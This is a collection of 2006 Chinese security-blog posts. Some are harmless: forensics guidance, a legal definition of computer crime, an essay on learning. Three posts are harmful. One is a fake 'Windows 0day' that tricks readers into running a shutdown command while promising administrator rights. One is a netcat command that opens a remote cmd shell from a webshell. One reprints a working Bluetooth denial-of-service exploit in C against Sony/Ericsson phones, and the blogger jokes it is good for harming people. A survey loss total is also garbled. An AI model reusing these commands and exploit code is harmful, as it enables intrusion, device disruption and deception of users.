1995年,“世界头号电脑黑客”凯文·米特尼克被捕。他被指控闯入许多电脑网络,包括入侵北美空中防务体系、美国国防部,偷窃了2万个信用号卡和复制软件。同年,俄罗斯黑客列文在英国被捕。他被控用笔记本电脑从纽约花旗银行非法转移至少370万美元到世界各地由他和他的同党控制的账户。

早报记者肖蜀韵

F B I 公布2005年度计算机犯罪调查结果
●攻击频率九成企业遭受过计算机安全事件,两成企业声称次数在20次以上。
●攻击类型病毒(83.7%)和间谍软件(79.5%)为主。
●经济损失超过六成的企业声称有经济损失,病毒和蠕虫导致了1200万美元的损失,是总共3200美元总损失的大头。
●攻击来源来自36个不同的国家,其中来自美国的占(26.1%)。
●安全防范大多数企业都说已经安装了最新的安全补丁,但是更高级的安全技术比如生物技术和智能卡认证等用的很少,另外44%的入侵来自企业内部。 ]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005js.html#comment Thu, 10 Aug 2006 13:14:06 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005js.html Dark2S Member http://blog.sina.com.cn/s/blog_48e51c1a010005jr.html 作者:张琦出处:中国计算机报[ 2005-09-19 16:10 ]摘要:许多企业不上报网络犯罪,其原因在于害怕这样做会对业务运作或企业商誉造成负面影响。他们担心这样做会让业务运作因此失序。更重要的是收集犯罪证据有一定困难。因此,CIO们应该在应急响应系统的建立中加入计算机犯罪证据的收集与分析环节。


如果有未经授权的入侵者入侵了你的网络,且破坏了数据,

  除了从备份系统中恢复数据之外,还需要做什么呢?

  从事网络安全工作的人都知道,黑客在入侵之后都会想方设法抹去自己在受害系统上的活动记录。目的是逃脱法律的制裁。

  而许多企业也不上报网络犯罪,其原因在于害怕这样做会对业务运作或企业商誉造成负面影响。他们担心这样做会让业务运作因此失序。更重要的是收集犯罪证据有一定困难。因此,CIO们应该在应急响应系统的建立中加入计算机犯罪证据的收集与分析环节。

  什么是“计算机犯罪取证”?

  计算机取证又称为数字取证或电子取证,是指对计算机入侵、破坏、欺诈、攻击等犯罪行为利用计算机软硬件技术,按照符合法律规范的方式进行证据获取、保存、分析和出示的过程。从技术上,计算机取证是一个对受侵计算机系统进行扫描和破解,以及对整个入侵事件进行重建的过程。

  计算机取证包括物理证据获取和信息发现两个阶段。物理证据获取是指调查人员到计算机犯罪或入侵的现场,寻找并扣留相关的计算机硬件;信息发现是指从原始数据(包括文件,日志等)中寻找可以用来证明或者反驳的证据,即电子证据。

  除了那些刚入门的“毛小子”之外,计算机犯罪分子也会在作案前周密部署、作案后消除蛛丝马迹。他们更改、删除目标主机的日志文件,清理自己的工具软件,或利用反取证工具来破坏侦察人员的取证。这就要求我们在反入侵的过程中,首先要清楚我们要做什么?然后才是怎么做的问题。

  物理取证是核心任务

  物理证据的获取是全部取证工作的基础。获取物理证据是最重要的工作,保证原始数据不受任何破坏。无论在任何情况下,调查者都应牢记5点:(1)不要改变原始记录;(2)不要在作为证据的计算机上执行无关的操作;(3)不要给犯罪者销毁证据的机会;(4)详细记录所有的取证活动;(5)妥善保存得到的物证。如果被入侵的计算机处于工作状态,取证人员应该设法保存尽可能多的犯罪信息。

  要做到这5点可以说困难重重,首先可能出现的问题就是无法保证业务的连续性。由于入侵者的证据可能存在于系统日志、数据文件、寄存器、交换区、隐藏文件、空闲的磁盘空间、打印机缓存、网络数据区和计数器、用户进程存储器、文件缓存区等不同的位置。由此看见,物理取证不但是基础,而且是技术难点。

  通常的做法是将要获取的数据包括从内存里获取易灭失数据和从硬盘获取等相对稳定数据,保证获取的顺序为先内存后硬盘。案件发生后,立即对目标机和网络设备进行内存检查并做好记录,根据所用操作系统的不同可以使用的内存检查命令对内存里易灭失数据获取,力求不要对硬盘进行任何读写操作,以免更改数据原始性。利用专门的工具对硬盘进行逐扇区的读取,将硬盘数据完整地克隆出来,便于今后在专门机器上对原始硬盘的镜像文件进行分析。

  “计算机法医”要看的现场是什么?(日志)

  有的时候,计算机取证(Computer Forensics)也可以称为计算机法医学,它是指把计算机看作是犯罪现场,运用先进的辨析技术,对电脑犯罪行为进行法医式的解剖,搜寻确认罪犯及其犯罪证据,并据此提起诉讼。好比飞机失事后,事故现场和当时发生的任何事都需要从飞机的“黑匣子”中获取。说到这里您可能就猜到了,计算机的黑匣子就是自身的日志记录系统。从理论上讲,计算机取证人员能否找到犯罪证据取决于:有关犯罪证据必须没有被覆盖;取证软件必须能找到这些数据;取证人员能知道这些文件,并且能证明它们与犯罪有关。但从海量的数据里面寻找蛛丝马迹是一件非常费时费力的工作,解决这一难题方法的就是切入点,所以说从日志入手才是最直接有效的手段。

  这里还需要指出,不同的操作系统都可以在“Event Viewer Security”(安全事件观察器)中能够检查到各种活动和日志信息,但是自身的防护性能都是非常低,一旦遭受到入侵,很容易就被清除掉。从中我们可以看到,专业的日志防护与分析软件在整个安全产品市场中的地位之重,无需置疑。

  我国有关计算机取证的研究与实践尚在起步阶段,在信息技术较发达的美国已有了30年左右的历史。现在美国至少有70%的法律部门拥有自己的计算机取证实验室,取证专家在实验室内分析从犯罪现场获取的计算机(和外设),并试图找出入侵行为。

  在国内,公安部门打击计算机犯罪案件是近几年的事,有关计算机取证方面的研究和实践才刚起步。中科院、浙江大学和复旦大学等在电子取证的各个技术方面都在积极开展研究工作。6月26日在北京召开的CFAT.2005首届中国计算机取证技术峰会也是旨在推动国内外计算机取证先进技术的传播和扩大研究交流的深度广度,促进计算机取证专业人员、司法界人士以及兴趣爱好者直接、深入的交流。在把企业业务连续性作为首位的同时,我们也呼吁更加智能化的物理取证工具的早日面试。


]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005jr.html#comment Thu, 10 Aug 2006 13:13:07 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005jr.html 计算机犯罪的概念 http://blog.sina.com.cn/s/blog_48e51c1a010005jq.html 扬州市互联网报警处置中心 
  计算机犯罪(computercrime)一词从被人们提出来到现在已经有许多年了,并且得以广泛使用,频繁见诸于报端。但是计算机犯罪究竟是什么?理论界至今仍然众说纷纭、各有其理,计算机犯罪的内涵仍然模糊不清。虽然在我国新修订的刑法第285条、286条、287条当中对计算机犯罪作了法律上的规定,但是仍然没有解决计算机犯罪定义的问题。
  计算机犯罪作为一类特殊的犯罪,具有其它犯罪所不具有的特点,因此必须对之进行研究,而研究的首要问题就是要解决其概念问题。只有在明确了其内涵之后,我们才能进行深入的研究。目前理论界对计算机犯罪的定义虽然有诸多讨论,但在论述过程中往往忽视了一个最基本的问题,到底什么是计算机?在大家看来,计算机似乎是一个很普通的概念,不需要进行特殊的说明。然而事实上对计算机的定义可以有很多种,因此在讨论计算机犯罪之前我们有必要首先解决计算机概念的问题。
从计算机科学的角度我们可以看到,所谓计算机,就是能够按照人们预先编制的程序对信息进行处理的机器,这也就是指计算机硬件。因此,主板、CPU、内存三者组成的主机就是基本的计算机,主机加上外部设备也是计算机,甚至连单独的CPU也应该被视为计算机,因为它们都符合计算机的定义。那么在法律上计算机的概念究竟应该是什么呢?
    单纯的计算机硬件在法律上具有的主要是财物的性质,因此以硬件意义上的计算机为对象的犯罪行为大多可以归入普通的财产犯罪中去,没有必要单独研究之。现代社会中所说的计算机,事实上指的是“计算机系统(computersystem)”。所谓计算机系统是指由计算机硬件与软件紧密结合在一起而构成的系统,这样的系统能够实现一定的自动信息处理功能,为普通使用者提供一定的服务。在这样的系统中,软件的价值和重要性与硬件相同,甚至远远超过硬件。这种系统同普通机械装置有了本质上的区别,它具有一定的智能性,这些特征是普通的财物所不具有的。
虽然计算机硬件中也有一些软件成份,例如人们往往在ROM中固化的引导程序等等,但这些程序都是为了实现硬件的基本功能而设计的,可以说是硬件的附属,没有它们硬件就不能相互配合甚至不能发挥作用,因此我们也将它们看作计算机硬件的组成部分。  一台主机与相应的外部设备以及在它们上面运行的软件就构成了一个基本的计算机系统;多个单机系统以一定的方式联结就构成了一个大的系统,我们一般将其称为局域网,局域网中还包含了网络控制软件等等系统软件;若干局域网联结在一起就构成了更大的网络系统,例如现在最大的国际网络Internet上面联结得有无数的局域网和个人计算机。所有这些我们都称之为计算机系统。正如计算机工业界的名言“网络就是计算机”所蕴含的意义那样,所有的计算机系统我们都在法律上称为计算机,关键的一点在于计算机系统必须是硬件和软件紧密有机的结合,二者缺一不可。
由此,我们在法律上对计算机作如下定义:计算机是由计算机硬件和计算机软件按照一定方式联系和结合而构成的,具有按照指令处理或者是自动处理信息的装置系统。计算机包括单机系统和网络系统。
    针对和利用计算机系统进行的犯罪具有许多传统犯罪所不具备的特征,如隐秘性强、破坏性大、技术含量高等等,传统的犯罪理论对之缺乏完善的描述与研究,因此必须单独对其进行研究。有关计算机的犯罪一般是采用窃取、篡改、破坏、销毁计算机系统内部的程序、数据和信息从而实现犯罪目的,因此这类犯罪事实上是信息犯罪。
据以上讨论,笔者认为,所谓计算机犯罪是指针对和利用计算机系统,通过非法操作或者以其他手段对计算机系统的完整性或正常运行造成危害后果的行为。计算机犯罪的犯罪对象是计算机系统内部的数据,所谓数据包括计算机程序、文本资料、运算数据、图形表格等等在计算机内部的信息(以下我们均在这种意义上使用“数据”一词)。这种犯罪在主观上不一定表现为谋取利益,客观上的表现是非法使用计算机系统。
  所谓非法操作,是指一切没有按照操作规程或是超越授权范围而对计算机系统进行的操作。非法操作是对计算机系统造成损害的直接原因,可以说没有非法操作就没有计算机犯罪。我们还需要将法律上规定的非法操作同计算机科学上的非法操作区分开来,计算机学中将一切错误的指令均视为非法操作,对这种操作计算机一般会给出错误信息,提醒使用者操作错误,这种意义上的非法操作含义非常广,只要是计算机系统不接受的操作都是非法操作。而我们在法律上所说的非法操作主要是指未经授权的操作,例如使用者可以通过某些手段使计算机系统错误地认为其操作是合法的并且接受和运行这些指令,再如使用者可以利用计算机系统设计上的某些缺陷来超越权限地接触一些数据或者修改它们,这样的操作都是计算机认为合法但在事实上是超越了使用权限的。这种操作在法律上的特征就是越权使用。在法律上我们不把哪些仅仅由于拼写错误而不被计算机所接受的指令认为是非法操作。

  计算机犯罪中包括针对系统的犯罪和针对系统处理的数据的犯罪两种,前者前者是对计算机硬件和系统软件组成的系统进行破坏的行为,后者是对计算机系统处理和储存的信息进行破坏。由以上定义我们可以看到计算机犯罪在法律上具有以下特点:
  1.计算机犯罪具有社会危害性。同所有的犯罪一样,正是因为计算机犯罪的行为具有社会危害性,我们才在刑法中规定其为犯罪,并且对其采取刑事制裁,没有社会危害性的行为绝对不是犯罪。虽然计算机犯罪人在主观上不一定是为了谋取利益,但是所有的计算机犯罪在客观上都会造成社会或者社会的损失。例如非法侵入计算机系统,虽然在表面上看犯罪者不一定获得什么利益,被侵入的计算机系统也不一定会发生什么变化,似乎这种行为没有什么危害,但是在事实上对计算机系统成功的侵入势必使得整个计算机系统的安全系统要重新构置,耗费的人力物力甚大,同时计算机系统所有者对资料的安全性在心理和物质上的损失也不小。
  2.计算机犯罪具有非法性。这种非法性体现在:首先计算机犯罪是法律所不允许行为,这种行为的后果是法律所禁止的,计算机犯罪的后果直接触犯法律;其次计算机犯罪必然是犯罪者超越了由法律或是权利人所授予的权利范围,也就是说计算机犯罪的本身表现为越权操作。
  3.计算机犯罪具有广泛性。这种犯罪是一类特殊的犯罪形态,其中包含有许多具体的罪名,有学者曾经说过,“除了强奸罪,计算机可以犯一切罪”。当然犯罪的只能是人而不是计算机,但是由此可见计算机犯罪的复杂性,事实上,除了有关人身的一些犯罪,一般的犯罪都可以通过计算机犯罪来完成。
  4.计算机犯罪具有明确性。虽然计算机犯罪的范围很广,但是其内涵十分明确,即它一定是对计算机系统内部的数据进行未经许可的处理并且造成社会危害后果的行为。并非一切有关普通意义上的犯罪都是计算机犯罪,例如盗窃或者毁损一台没有任何软件和资料的计算机的行为,在性质上和普通的盗窃或者毁损财物犯罪并无二致,这种行为不属于计算机犯罪。
  在1997年3月15日全国人民代表大会通过的《中华人民共和国刑法》的第285条、286条、287条中对计算机犯罪进行了如下规定。“第二百八十五条违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。”“第二百八十六条违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。”“第二百八十七条利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的,依照本法有关规定定罪处罚。”从《刑法》的规定我们可以看到,我国刑法对计算机犯罪采取了概括列举的方式。从这三款的条文来看,刑法主要是将那些以计算机系统作为犯罪对象的行为划入了计算机犯罪中,而以计算机为工具的犯罪则按其他犯罪进行处罚。刑法的规定和我们对计算机犯罪的定义基本是一致的,刑法也强调是针对计算机信息系统的犯罪才是计算机犯罪,至于涉及其他罪名的计算机犯罪则按刑法理论中的一罪和数罪的理论来规定。总的来说,计算机犯罪就是信息犯罪,是针对计算机系统内部信息而进行的犯罪。把握这一点,我们就能准确地研究计算机犯罪。 ]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005jq.html#comment Thu, 10 Aug 2006 13:12:22 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005jq.html 发布个微软的0day吧 http://blog.sina.com.cn/s/blog_48e51c1a010005j4.html 最新windows溢出利用方法`。影响版本。全系统

利用方法:开始--运行--cmd。。
输入:shutdown -s (回车)。
随后电脑如果出现黑屏`。证明溢出成功。  得到administrator权限

 

PS

出问题别找我

 

 

]]> 马骏 心情 http://blog.sina.com.cn/s/blog_48e51c1a010005j4.html#comment Tue, 08 Aug 2006 17:09:59 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005j4.html webshell下用NC反弹shell http://blog.sina.com.cn/s/blog_48e51c1a010005ii.html nc -e cmd.exe -l -p [port]
然后用nc -vv ip port连上去!
guestshell ]]> 马骏 入侵 http://blog.sina.com.cn/s/blog_48e51c1a010005ii.html#comment Mon, 07 Aug 2006 22:18:25 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005ii.html Sony/Ericsson手机蓝牙栈拒绝服务漏洞 http://blog.sina.com.cn/s/blog_48e51c1a010005ih.html 受影响系统:
Sony Sony/Ericsson W800i
Sony Sony/Ericsson V600i
Sony Sony/Ericsson T68i
Sony Sony/Ericsson K750i
Sony Sony/Ericsson K600i
描述:
--------------------------------------------------------------------------------
Sony/Ericsson是目前市面上非常流行的手机,一些型号支持蓝牙通讯。

Sony/Ericsson的蓝牙协议栈实现上存在问题,远程攻击者可能利用此漏洞导致手机工作不正常。

如果向支持蓝牙的Sony/Ericsson手机发送畸形报文的话,就可能导致设备的屏幕逐渐关闭,然后显示白屏,大约经过45秒中之后能够恢复正常状态。

短的原始L2CAP报文如下:

08 01 01 00

它代表以下L2CAP首部字段:

code L2CAP_ECHO_REQ;
ident 1
length 1

实际发送的报文是4个字节长。

如果L2CAP字段发送的长度等于真实长度减去3(这里是L2CAP首部的大小)的话就可以触发拒绝服务。

<*来源:Pierre Betouin (pierre.betouin@infratech.fr
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2006-02/0089.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* Sony/Ericsson reset display - PoC */
/* Pierre BETOUIN - pierre.betouin@infratech.fr */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download www.secuobs.com/news/05022006-bluetooth10.shml */
/* */
/* Causes anormal behaviours on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* - K600i */
/* - V600i */
/* - K750i */
/* - W800i */
/* - And maybe other ones... */
/* */
/* Vulnerable devices will slowly turn their screen into */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc -lbluetooth reset_display_sonyericsson.c */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
    char *buffer;
    l2cap_cmd_hdr *cmd;
    struct sockaddr_l2 addr;
    int sock, sent, i;

    if(argc < 2)
    {
        fprintf(stderr, "%s <btaddr>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&addr, 0, sizeof(addr));
    addr.l2_family = AF_BLUETOOTH;

    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
    {
        perror("bind");
        exit(EXIT_FAILURE);
    }

    str2ba(argv[1], &addr.l2_bdaddr);

    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
    {
        perror("connect");
        exit(EXIT_FAILURE);
    }

    if(!(buffer = (char *) malloc ((int) SIZE + 1)))
    {
        perror("malloc");
        exit(EXIT_FAILURE);
    }

    memset(buffer, 90, SIZE);

    cmd = (l2cap_cmd_hdr *) buffer;
    cmd->code = L2CAP_ECHO_REQ;
    cmd->ident = 1;
    cmd->len = FAKE_SIZE;

    if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
    {
        printf("L2CAP packet sent (%d)\n", sent);
    }

    printf("Buffer:\t");
    for(i=0; i<sent; i++)
        printf("%.2X ", (unsigned char) buffer);
    printf("\n");

    free(buffer);
    close(sock);
    return EXIT_SUCCESS;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Sony
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sonyericsson.com/spg. ... ate=pg1&zone=pg
PS
 一个老漏洞了 从dark2s上发现的公告
 
 拿来害很不错  哈哈哈哈
]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005ih.html#comment Mon, 07 Aug 2006 22:11:22 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005ih.html 你尽力了吗? http://blog.sina.com.cn/s/blog_48e51c1a010005ig.html 此文转自华中科技大学(原华中理工大学)的BBS白云黄鹤!乃小四哥的经典名贴!
你尽力了吗?

很多人问如何入门如何入门,我却不知道要问的是入什么门。很少把某些好
文章耐心从头看完,我这次就深有体会。比如袁哥的sniffer原理,一直以为
自己对sniffer原理很清楚的,所以也就不曾仔细看过袁哥的这篇。后来有天
晚上和袁哥讨论,如何通过端口读写直接获取mac地址,为什么antisniff可以
获得真正的mac地址,而不受更改mac地址技术的影响,如何在linux下获得
真正的mac地址。我一直对linux下的端口读写心存疑虑,总觉得在保护模式下
的端口都做了内存映象等等。结果袁哥问了我一句,你仔细看我写的文章没有,
我楞,最近因为要印刷月刊,我整理以前的很多文档,被迫认真过滤它们,才
发现袁哥的文章让我又有新认识。再后来整理到tt的几篇缓冲区溢出的,尤其
是上面的关于Solaris可装载内核模块,那就更觉得惭愧了。以前说书非借不能
读,现在是文章留在硬盘上却不读。其实本版已经很多经典文章了,也推荐了
不少经典书籍了,有几个好好看过呢。W.Richard.Stevens的UNP我算是认真看
过加了不少旁注,APUE就没有那么认真了,而卷II的一半认真看过,写过读书
笔记,卷III就没有看一页。道格拉斯的卷I、卷III是认真看过几遍,卷II就
只断续看过。而很多技术文章,如果搞到手了就懒得再看,却不知道这浪费了
多少资源,忽略了多少资源。BBS是真正能学到东西的地方吗?rain说不是的,
我说也不是的。不过这里能开阔人的视野,能得到对大方向的指引,足够了。
我一直都希望大家从这里学到的不是技术本身,而是学习方法和一种不再狂热
的淡然。很多技术,明天就会过时,如果你掌握的是学习方法,那你还有下一个
机会,如果你掌握的仅仅是这个技术本身,你就没有机会了。其实我对系统安全
是真不懂,因为我一直都喜欢看程序写程序却不喜欢也没有能力攻击谁谁的
主机/站点。我所能在这里做的是,为大家提供一个方向,一种让你的狂热归于
淡然的说教。如果你连<Windows NT设备驱动程序编写>、< win9x系统编程>都
没有看过,却要写个什么隐藏自己的木马,搞笑。如果你看都不看汇编语言,
偏要问exploit code的原理,那我无法回答也不想回答你。总有人责问,要
讨个说法纭纭,说什么提问却没有回答。不回答已经是正确的处理方式了,
至少没有回你一句,看书去,对不对,至少没有扰乱版面让你生闷气。
Unix的man手册你要都看完了,想不会Unix都不行了。微软的
MSDN、Platform SDK DOC你要看完了,你想把Win编程想象得稍微困难点都找
不到理由。还是那句话,一个程序员做到W.Richard.Stevens那个份上,
做到逝世后还能叫全世界的顶级hacker们专门著文怀念,但生前却不曾著文
攻击,想想看,那是一种什么样的境界,那是一份什么样的淡然。我们可以
大肆讨论技术问题,可以就技术问题进行激烈的卓有成效的讨论,却无意进行
基础知识、资源信息的版面重复。我刚在前面贴了一堆isbase的文章,开头
就是主页标识,却在后面立刻问什么主页在哪里?前面刚刚讨论过如何
修改mac地址,后面马上又来一个,前后相差不过3篇文章。选择沉默已经是很多
朋友忍耐力的优异表现了。很多东西都是可以举一反三的。vertex的lids,
被packetstorm天天追踪更新,你要是看了THC的那三篇,觉得理解一个就理解了
一堆,都是内核模块上的手脚。你不看你怎么知道。我不想在这里陷入具体技术
问题的讨论中去,你要是觉得该做点什么了,就自己去看自己去找。没有什么人
摆什么架子,也没有什么人生来就是干这个的。你自己问自己,尽力了吗? ]]> 马骏 人物简介 http://blog.sina.com.cn/s/blog_48e51c1a010005ig.html#comment Mon, 07 Aug 2006 22:00:37 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005ig.html